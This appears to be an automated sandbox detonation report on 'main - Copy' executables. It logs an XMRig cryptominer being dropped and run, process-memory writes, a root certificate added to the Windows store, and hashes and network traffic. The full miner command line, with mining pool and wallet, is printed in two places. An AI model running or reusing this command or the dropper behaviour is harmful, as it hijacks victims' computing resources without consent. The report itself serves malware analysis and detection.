xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| BE | 88.221.83.200:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.17.178.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2700-14-0x0000017D97180000-0x0000017D971A0000-memory.dmp
memory/2700-15-0x0000017D971D0000-0x0000017D971F0000-memory.dmp
memory/2700-16-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-18-0x0000017D971F0000-0x0000017D97210000-memory.dmp
memory/2700-17-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-19-0x0000017D97210000-0x0000017D97230000-memory.dmp
memory/2700-20-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-22-0x0000017D971F0000-0x0000017D97210000-memory.dmp
memory/2700-21-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-23-0x0000017D97210000-0x0000017D97230000-memory.dmp
memory/2700-24-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-25-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-26-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-27-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-28-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-29-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-30-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-31-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-32-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-33-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-34-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-35-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-36-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-37-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-38-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-39-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-40-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-41-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-42-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-43-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-44-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-45-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-46-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-47-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-48-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-49-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-50-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-51-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-52-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-53-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-54-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-55-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-56-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-57-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-58-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-59-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-60-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-61-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-62-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-63-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-64-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-65-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-66-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-67-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-68-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-69-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-70-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-71-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-72-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-73-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-74-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-75-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-76-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-77-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-78-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-79-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-80-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-81-0x00007FF648450000-0x00007FF648F53000-memory.dmp
memory/2700-82-0x00007FF648450000-0x00007FF648F53000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:22
Platform
win10v2004-20240508-en
Max time kernel
1605s
Max time network
1617s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3756 wrote to memory of 1080 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3756 wrote to memory of 1080 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| BE | 88.221.83.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1080-14-0x0000024B9E280000-0x0000024B9E2A0000-memory.dmp
memory/1080-15-0x0000024B9E2C0000-0x0000024B9E2E0000-memory.dmp
memory/1080-16-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-18-0x0000024B9E300000-0x0000024B9E320000-memory.dmp
memory/1080-17-0x0000024B9E2E0000-0x0000024B9E300000-memory.dmp
memory/1080-19-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-20-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-23-0x0000024B9E300000-0x0000024B9E320000-memory.dmp
memory/1080-22-0x0000024B9E2E0000-0x0000024B9E300000-memory.dmp
memory/1080-21-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-24-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-25-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-26-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-27-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-28-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-29-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-30-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-31-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-32-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-33-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-34-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-35-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-36-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-37-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-38-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-39-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-40-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-41-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-42-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-43-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-44-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-45-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-46-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-47-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-48-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-49-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-50-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-51-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-52-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-53-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-54-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-55-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-56-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-57-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-58-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-59-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-60-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-61-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-62-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-63-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-64-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-65-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-66-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-67-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-68-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-69-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-70-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-71-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-72-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-73-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-74-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-75-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-76-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-77-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-78-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-79-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-80-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-81-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
memory/1080-82-0x00007FF7A5EE0000-0x00007FF7A69E3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:35
Platform
win10v2004-20240508-en
Max time kernel
1744s
Max time network
1756s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:37
Platform
win10v2004-20240611-en
Max time kernel
1796s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
